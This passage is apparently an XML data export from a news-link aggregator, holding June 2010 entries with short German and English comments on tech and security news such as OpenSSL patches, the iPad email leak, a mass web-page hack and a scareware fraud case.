name="excerpt_html">&lt;p&gt;Die Ministerpräsidenten der Länder haben gestern ihre Unterschrift unter den neuen Jugendmedienschutz-Staatsvertrag (JMStV) gesetzt, mit dem eine Altersbeschränkung für Webseiten eingeführt werden soll. Bürgerrechtler bezweifeln die Freiwilligkeit der Kontrolle und warnen vor dem Einstieg in die (Selbst-) Zensur.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.spreeblick.com/2010/06/11/ministerprasidenten-unterzeichnen-den-jugendmedienschutz-staatvertrag/#more-32714</field><field type="FileField" name="page_screenshot">page_shots/2010/06/12/ministerprasidenten-unterzeichnen-den-jugendmedien.png</field><field type="SlugField" name="slug">ministerprasidenten-unterzeichnen-den-jugendmedien</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-12 18:51:11</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">censorship deutschland dpi germany jmstv zensur</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="231" model="submitter.newsentry"><field type="CharField" name="title">Wireless signals to be jammed in Canada for G8 summit • The Register</field><field type="TextField" name="excerpt">G8 Gipfel mit jammed air. Warum machen die das G8 Treffen nicht auf dem Mond?</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;G8 Gipfel mit jammed air. Warum machen die das G8 Treffen nicht auf dem Mond?
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/06/11/wireless_jamming_canada/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/12/wireless-signals-to-be-jammed-in-canada-for-g8-sum.png</field><field type="SlugField" name="slug">wireless-signals-to-be-jammed-in-canada-for-g8-sum</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-12 18:34:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">g8 jammer</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="230" model="submitter.newsentry"><field type="CharField" name="title">OpenSSL-Updates beseitigen Schwachstellen</field><field type="TextField" name="excerpt">Die OpenSSL-Entwickler haben die Versionen 0.9.8o und 1.0.0a vorgelegt, in denen sie nur sicherheitsrelevante Probleme gelöst haben. So lässt sich ein Fehler im ASN.1-Parser ausnutzen, um mit präparierten Strukturen einer "Cryptographic Message Syntax"-Nachricht (CMS) in nicht erlaubte Speicherbereiche zu schreiben. Möglicherweise lässt sich der Fehler ausnutzen, um Code in ein System zu schleusen und ein System zu kompromittieren. In dem OpenSSL-Zweig 0.9.8 ist CMS standardmäßig nicht aktiviert, im Zweig 1.0.0 ist es jedoch aktiviert.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die OpenSSL-Entwickler haben die Versionen 0.9.8o und 1.0.0a vorgelegt, in denen sie nur sicherheitsrelevante Probleme gelöst haben. So lässt sich ein Fehler im ASN.1-Parser ausnutzen, um mit präparierten Strukturen einer "Cryptographic Message Syntax"-Nachricht (CMS) in nicht erlaubte Speicherbereiche zu schreiben. Möglicherweise lässt sich der Fehler ausnutzen, um Code in ein System zu schleusen und ein System zu kompromittieren. In dem OpenSSL-Zweig 0.9.8 ist CMS standardmäßig nicht aktiviert, im Zweig 1.0.0 ist es jedoch aktiviert.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/security/meldung/OpenSSL-Updates-beseitigen-Schwachstellen-1014668.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/12/openssl-updates-beseitigen-schwachstellen.png</field><field type="SlugField" name="slug">openssl-updates-beseitigen-schwachstellen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-12 13:13:19</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">openssl patch ssl</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="229" model="submitter.newsentry"><field type="CharField" name="title">Apple's Worst Security Breach: 114,000 iPad Owners Exposed</field><field type="TextField" name="excerpt">Was actually a hack; one had to guess the ICC-ID of the SIM and the AT&amp;T server responded with the e-mail address.
Now, the FBI is investigating ...</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Was actually a hack; one had to guess the ICC-ID of the SIM and the AT&amp;amp;T server responded with the e-mail address.
&lt;/p&gt;
&lt;p&gt;Now, the FBI is investigating ...
&lt;/p&gt;</field><field type="CharField" name="external_url">http://gawker.com/5559346/apples-worst-security-breach-114000-ipad-owners-exposed?skyline=true&amp;s=i</field><field type="FileField" name="page_screenshot">page_shots/2010/06/12/apples-worst-security-breach-114000-ipad-owners.png</field><field type="SlugField" name="slug">apples-worst-security-breach-114000-ipad-owners</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">16</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 23:52:34</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">apple ipad</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="228" model="submitter.newsentry"><field type="CharField" name="title">Deleting Facebook accounts doesn't</field><field type="TextField" name="excerpt"> Facebook didn't close his account down. Turns out that if third-party sites (like Twitter or YouTube) make updates to your profile within 14 days of the deletion, Facebook resets the process. How about that. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; Facebook didn't close his account down. Turns out that if third-party sites (like Twitter or YouTube) make updates to your profile within 14 days of the deletion, Facebook resets the process. How about that.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://techcrunch.com/2010/06/11/calacanis-facebook-profile/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/11/deleting-facebook-accounts-doesnt.png</field><field type="SlugField" name="slug">deleting-facebook-accounts-doesnt</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 23:02:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">facebook, online, privacy, social network</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="227" model="submitter.newsentry"><field type="CharField" name="title">Crooks siphon $644,000 from school district's bank account • The Register</field><field type="TextField" name="excerpt">Taxmoney at work.
Cyber thieves have targeted the New York State Department of Education,
electronically draining one of the department's bank accounts of more
than US $644,000. The account, which was designated for petty cash
spending, was limited to US $500 purchases, but an oversight allowed
transfers of any amount. The thieves made transfers for more than three
years before the scheme was detected. Officials didn't discover the
problem because they neglected to reconcile their accounts regularly.
Albert Attoh was sentenced to one year in prison and ordered to pay US
$270,000 in restitution for his role in the thefts. In exchange for
payments, Attoh gave bank routing and account data to other people who
used it to pay student loans and make purchases.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Taxmoney at work.
&lt;/p&gt;
&lt;p&gt;Cyber thieves have targeted the New York State Department of Education,
electronically draining one of the department's bank accounts of more
than US $644,000. The account, which was designated for petty cash
spending, was limited to US $500 purchases, but an oversight allowed
transfers of any amount. The thieves made transfers for more than three
years before the scheme was detected. Officials didn't discover the
problem because they neglected to reconcile their accounts regularly.
Albert Attoh was sentenced to one year in prison and ordered to pay US
$270,000 in restitution for his role in the thefts. In exchange for
payments, Attoh gave bank routing and account data to other people who
used it to pay student loans and make purchases.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/06/07/electronic_account_raided/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/11/crooks-siphon-644000-from-school-districts-bank.png</field><field type="SlugField" name="slug">crooks-siphon-644000-from-school-districts-bank</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 22:20:34</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">fraud</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="226" model="submitter.newsentry"><field type="CharField" name="title">Windows Help used as attack surface - The H Security: News and Features</field><field type="TextField" name="excerpt">0 day in Win (irgendwas mit Helpcenter) released von einem Google Typen namens Ormandy. Das letzte Mal hat er Monate auf einen Fix gewartet. FD, responsible Disclosure ...</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;0 day in Win (irgendwas mit Helpcenter) released von einem Google Typen namens Ormandy. Das letzte Mal hat er Monate auf einen Fix gewartet. FD, responsible Disclosure ...
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.h-online.com/security/news/item/Windows-Help-used-as-attack-surface-1019381.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/11/windows-help-used-as-attack-surface-the-h-securi.png</field><field type="SlugField" name="slug">windows-help-used-as-attack-surface-the-h-securi</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 22:18:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">0day exploit microsoft windows</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="225" model="submitter.newsentry"><field type="CharField" name="title">Mass hack plants malware on thousands of webpages • The Register</field><field type="TextField" name="excerpt">Sportlich: 100.000 IIS + MSSQL + ASP 0wn3d
Tens of thousands of web pages have been infected with malicious HTML
code that redirects visitors to a web server that tries to download
malware onto their computers. The attacks have compromised web pages
on several high-profile sites, including The Wall Street Journal and The
Jerusalem Post. While researchers do not yet have a definitive answer
as to the nature of the attacks, there is strong suspicion that an SQL
injection attack was used. All the affected web sites appear to be
running Microsoft Internet Information Services Web-server software with
Active Server Pages. The number of affected pages has dropped
significantly since the attack was first detected.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Sportlich: 100.000 IIS + MSSQL + ASP 0wn3d
&lt;/p&gt;
&lt;p&gt;Tens of thousands of web pages have been infected with malicious HTML
code that redirects visitors to a web server that tries to download
malware onto their computers. The attacks have compromised web pages
on several high-profile sites, including The Wall Street Journal and The
Jerusalem Post. While researchers do not yet have a definitive answer
as to the nature of the attacks, there is strong suspicion that an SQL
injection attack was used. All the affected web sites appear to be
running Microsoft Internet Information Services Web-server software with
Active Server Pages. The number of affected pages has dropped
significantly since the attack was first detected.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/06/09/mass_webpage_attack/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/11/mass-hack-plants-malware-on-thousands-of-webpages.png</field><field type="SlugField" name="slug">mass-hack-plants-malware-on-thousands-of-webpages</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 22:15:01</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">malware</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="224" model="submitter.newsentry"><field type="CharField" name="title">Microsoft explains mystery Firefox extension, &amp;quot;fixes&amp;quot; update</field><field type="TextField" name="excerpt">MS Security update installs Firefox called Search Helper Extension. Uninstall quite difficult.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;MS Security update installs Firefox called Search Helper Extension. Uninstall quite difficult.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/microsoft/news/2010/06/microsoft-explains-mystery-firefox-extension-fixes-update-1.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/06/11/microsoft-explains-mystery-firefox-extension-quo.png</field><field type="SlugField" name="slug">microsoft-explains-mystery-firefox-extension-quo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 22:11:41</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">firefox microsoft windows</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="223" model="submitter.newsentry"><field type="CharField" name="title">31/05/10 - Consultation on development of a data security breach code of practice - Data Protection Commissioner - Ireland</field><field type="TextField" name="excerpt">ausbaufähiges Model für .de.
The Irish Data Protection Commissioner has published a draft security
breach code of practice that, if adopted, would require any data breach
involving information belonging to more than 100 people be reported to
the Data Protection Commissioner. Organizations would be exempt from
the requirement if they demonstrate that the compromised data are
protected by strong security measures or if the breach affects
non-sensitive information or small amounts of personal information.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;ausbaufähiges Model für .de.
&lt;/p&gt;
&lt;p&gt;The Irish Data Protection Commissioner has published a draft security
breach code of practice that, if adopted, would require any data breach
involving information belonging to more than 100 people be reported to
the Data Protection Commissioner. Organizations would be exempt from
the requirement if they demonstrate that the compromised data are
protected by strong security measures or if the breach affects
non-sensitive information or small amounts of personal information.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.dataprotection.ie/viewdoc.asp?DocID=1077&amp;m=f</field><field type="FileField" name="page_screenshot">page_shots/2010/06/11/310510-consultation-on-development-of-a-data-s.png</field><field type="SlugField" name="slug">310510-consultation-on-development-of-a-data-s</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 22:03:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">dataloss</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="222" model="submitter.newsentry"><field type="CharField" name="title">Adobe - Security Advisories: Security Advisory for Flash Player, Adobe Reader and Acrobat</field><field type="TextField" name="excerpt">Wird echt Zeit, dass das ausstirbt.
Adobe will issue a fix for a critical zero-day vulnerability in Flash
on Thursday, June 10, but a patch for the same flaw in Adobe Reader and
Acrobat will not be made available until later in the month. The Flash
vulnerability is being addressed first because it is more likely to be
exploited without user interaction. The flaw is already being actively
exploited through specially-crafted PDF documents. Adobe has
*accelerated* its scheduled July 13 quarterly update by two weeks and
plans to release security updates for Reader and Acrobat on June 29.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Wird echt Zeit, dass das ausstirbt.
&lt;/p&gt;
&lt;p&gt;Adobe will issue a fix for a critical zero-day vulnerability in Flash
on Thursday, June 10, but a patch for the same flaw in Adobe Reader and
Acrobat will not be made available until later in the month. The Flash
vulnerability is being addressed first because it is more likely to be
exploited without user interaction. The flaw is already being actively
exploited through specially-crafted PDF documents. Adobe has
&lt;em&gt;accelerated&lt;/em&gt; its scheduled July 13 quarterly update by two weeks and
plans to release security updates for Reader and Acrobat on June 29.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.adobe.com/support/security/advisories/apsa10-01.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/11/adobe-security-advisories-security-advisory-for.png</field><field type="SlugField" name="slug">adobe-security-advisories-security-advisory-for</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 21:59:55</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">adobe flash pdf vulnerability</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="221" model="submitter.newsentry"><field type="CharField" name="title">Linux Today - Memo From Dell: Ubuntu Linux Safer Than Microsoft Windows</field><field type="TextField" name="excerpt">Reminds me of a comment on the BBT Ubuntu commercial: Only lamers have Win.
Update: [s/Ubuntu is more secure/Ubuntu is secure/](http://www.heise.de/open/meldung/Dell-wirbt-ein-bisschen-weniger-fuer-Linux-1025074.html)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Reminds me of a comment on the BBT Ubuntu commercial: Only lamers have Win.
&lt;/p&gt;
&lt;p&gt;Update: &lt;a href="http://www.heise.de/open/meldung/Dell-wirbt-ein-bisschen-weniger-fuer-Linux-1025074.html"&gt;s/Ubuntu is more secure/Ubuntu is secure/&lt;/a&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.linuxtoday.com/news_story.php3?ltsn=2010-06-11-005-39-OP-MS-UB</field><field type="FileField" name="page_screenshot">page_shots/2010/06/18/linux-today-memo-from-dell-ubuntu-linux-safer-t_.png</field><field type="SlugField" name="slug">linux-today-memo-from-dell-ubuntu-linux-safer-t</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 15:05:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">linux microsoft ubuntu windows</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="220" model="submitter.newsentry"><field type="CharField" name="title">Apple Outsider Hello, Lua</field><field type="TextField" name="excerpt">Sieht so aus, als ob Apple interpretierte Sprachen auf dem iPhone zu läßt - zumindest nicht mehr kategorisch ausschließt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Sieht so aus, als ob Apple interpretierte Sprachen auf dem iPhone zu läßt - zumindest nicht mehr kategorisch ausschließt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.appleoutsider.com/2010/06/10/hello-lua/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/11/apple-outsider-raquo-hello-lua_.png</field><field type="SlugField" name="slug">apple-outsider-raquo-hello-lua</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 13:08:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">apple iphone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="219" model="submitter.newsentry"><field type="CharField" name="title">SCOwned: no new trial, Novell can shut down IBM lawsuit</field><field type="TextField" name="excerpt">SCO tried again. Judge said no. Hopefully that is the end of this stroy.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;SCO tried again. Judge said no. Hopefully that is the end of this stroy.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/tech-policy/news/2010/06/scowned-no-new-trial-novell-can-shut-down-ibm-lawsuit.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/06/11/scowned-no-new-trial-novell-can-shut-down-ibm-la.png</field><field type="SlugField" name="slug">scowned-no-new-trial-novell-can-shut-down-ibm-la</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 12:40:16</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">microsoft sco</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="218" model="submitter.newsentry"><field type="CharField" name="title">Hintergrund zum exFAT Treiber von Tuxera</field><field type="TextField" name="excerpt">Nutzung soll $ 25,- teuer werden. MS verbreitet FUD</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Nutzung soll $ 25,- teuer werden. MS verbreitet FUD
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/open/artikel/Die-Woche-Ein-Patent-mit-grosser-Zukunft-1015259.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/11/hintergrund-zum-exfat-treiber-von-tuxera.png</field><field type="SlugField" name="slug">hintergrund-zum-exfat-treiber-von-tuxera</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-11 11:53:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">foss microsoft patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object><object pk="3"></object></field></object><object pk="217" model="submitter.newsentry"><field type="CharField" name="title">
Which companies are phasing out PVC and BFRs | Greenpeace International
</field><field type="TextField" name="excerpt">Which companies are phasing out PVC and BFRs</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Which companies are phasing out PVC and BFRs
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.greenpeace.org/international/en/campaigns/toxics/electronics/Guide-to-Greener-Electronics/which-companies-really-sell-gr/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/09/which-companies-are-phasing-out-pvc-and-bfrs.png</field><field type="SlugField" name="slug">which-companies-are-phasing-out-pvc-and-bfrs</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-09 21:14:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">environment greenpeace toxic</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="216" model="submitter.newsentry"><field type="CharField" name="title">Olympus Stylus Tough camera carries malware infection | Graham Cluley&amp;#39;s blog</field><field type="TextField" name="excerpt">Wie auch [Samsung](http://www.heise.de/newsticker/meldung/Samsung-Wave-mit-Virus-ab-Werk-aber-nur-in-Deutschland-1014881.html) pre-0wned device (camera this time).</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Wie auch &lt;a href="http://www.heise.de/newsticker/meldung/Samsung-Wave-mit-Virus-ab-Werk-aber-nur-in-Deutschland-1014881.html"&gt;Samsung&lt;/a&gt; pre-0wned device (camera this time).
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.sophos.com/blogs/gc/g/2010/06/08/olympus-stylus-tough-camera-carries-malware-infection/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/09/olympus-stylus-tough-camera-carries-malware-infect.png</field><field type="SlugField" name="slug">olympus-stylus-tough-camera-carries-malware-infect</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-09 15:21:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">pre0wned virus</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="215" model="submitter.newsentry"><field type="CharField" name="title">Foxconn Scrapping Suicide Compensation To Stop Deaths</field><field type="TextField" name="excerpt">Das ist da wo die ganzen Teilchen herkommen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das ist da wo die ganzen Teilchen herkommen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://gizmodo.com/5558920/foxconn-scrapping-suicide-compensation-to-stop-deaths</field><field type="FileField" name="page_screenshot">page_shots/2010/06/09/foxconn-scrapping-suicide-compensation-to-stop-dea.png</field><field type="SlugField" name="slug">foxconn-scrapping-suicide-compensation-to-stop-dea</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-09 15:05:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">suicide</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="214" model="submitter.newsentry"><field type="CharField" name="title">heise online - 15 Jahre PHP</field><field type="TextField" name="excerpt">Evolution braucht echt lange...
[fukami@twitter](http://twitter.com/fukami/status/15698118094) Glückwunsch zu 11.870 Sicherheitslöchern in 15 Jahren PHP [BTW knapp 1/4 aller Einträge bei NIST](http://nvd.nist.gov/)
[Lerdorf wikiquotes](http://en.wikiquote.org/wiki/Rasmus_Lerdorf) mit Perlen wie _There are people who actually like programming. I don't understand why they like programming._</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Evolution braucht echt lange...
&lt;/p&gt;
&lt;p&gt;&lt;a href="http://twitter.com/fukami/status/15698118094"&gt;fukami@twitter&lt;/a&gt; Glückwunsch zu 11.870 Sicherheitslöchern in 15 Jahren PHP &lt;a href="http://nvd.nist.gov/"&gt;BTW knapp 1/4 aller Einträge bei NIST&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="http://en.wikiquote.org/wiki/Rasmus_Lerdorf"&gt;Lerdorf wikiquotes&lt;/a&gt; mit Perlen wie &lt;em&gt;There are people who actually like programming. I don't understand why they like programming.&lt;/em&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/15-Jahre-PHP-1017276.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/08/heise-online-15-jahre-php___.png</field><field type="SlugField" name="slug">heise-online-15-jahre-php</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-08 14:37:00</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">php</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="213" model="submitter.newsentry"><field type="CharField" name="title">Google tries to patent tech that snoops Wi-Fi networks • The Register</field><field type="TextField" name="excerpt">Google patents war-driving.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google patents war-driving.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/06/03/google_wardriving_patent/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/07/google-tries-to-patent-tech-that-snoops-wi-fi-netw.png</field><field type="SlugField" name="slug">google-tries-to-patent-tech-that-snoops-wi-fi-netw</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-07 23:24:26</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">google patent wardriving</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="212" model="submitter.newsentry"><field type="CharField" name="title">3 men charged in $100m scareware scam • The Register</field><field type="TextField" name="excerpt">Three men have been indicted for allegedly running a scareware scheme
that took in more than US *$100 million*. The trio allegedly established
phony Internet advertising agencies to get their infected ads onto
websites. The code hidden in the ads redirected users' browsers to
maliciously crafted websites where they were greeted with pop-up windows
telling them their computers were infected with malware and that they
needed to purchase software to fix the problems. The phony anti-virus
software cost between US $30 and US $70. The US Federal Trade
Commission (FTC) filed similar charges against operators of the same
companies in 2008. Shaileshkumar P. Jain, Bjorn Daniel Sundin and James
Reno are all facing charges of wire fraud, computer fraud, and
conspiracy to commit computer fraud.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Three men have been indicted for allegedly running a scareware scheme
that took in more than US &lt;em&gt;$100 million&lt;/em&gt;. The trio allegedly established
phony Internet advertising agencies to get their infected ads onto
websites. The code hidden in the ads redirected users' browsers to
maliciously crafted websites where they were greeted with pop-up windows
telling them their computers were infected with malware and that they
needed to purchase software to fix the problems. The phony anti-virus
software cost between US $30 and US $70. The US Federal Trade
